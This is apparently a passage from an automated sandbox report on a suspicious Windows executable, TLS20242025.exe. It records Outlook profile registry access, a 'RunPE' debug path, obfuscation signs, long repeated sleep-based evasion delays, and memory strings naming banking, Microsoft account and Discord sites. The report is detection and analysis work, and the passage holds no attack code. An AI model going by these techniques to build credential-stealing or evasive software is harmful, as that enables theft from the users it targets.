                    Source: C:\Users\user\Desktop\TLS20242025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\TLS20242025.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: TLS20242025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: TLS20242025.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: TLS20242025.exe, 00000000.00000002.4587810220.0000000005200000.00000004.08000000.00040000.00000000.sdmp, TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: TLS20242025.exe, ExportProvider.cs.Net Code: CreateExportFactory
                    Source: TLS20242025.exeStatic PE information: 0xEA086D61 [Thu Jun 3 16:27:13 2094 UTC]
                    Source: TLS20242025.exeStatic PE information: section name: .text entropy: 7.257003686976549
                    Source: C:\Users\user\Desktop\TLS20242025.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeMemory allocated: 28E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeMemory allocated: 48E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599327Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596920Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596803Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596218Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596000Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595781Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595671Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595343Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595015Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 594905Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 594796Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 594687Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 594575Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeWindow / User API: threadDelayed 1657Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeWindow / User API: threadDelayed 8201Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep count: 32 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4948Thread sleep count: 1657 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4948Thread sleep count: 8201 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -599327s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -598671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -597796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -597578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -597359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -596920s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -596803s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -596672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -596547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -596437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -596328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -596218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -596109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -596000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -595890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -595781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -595671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -595562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -595453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -595343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -595234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -595125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -595015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -594905s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -594796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -594687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876Thread sleep time: -594575s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599327Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596920Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596803Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596218Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 596000Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595781Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595671Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595343Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 595015Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 594905Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 594796Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 594687Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeThread delayed: delay time: 594575Jump to behavior
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
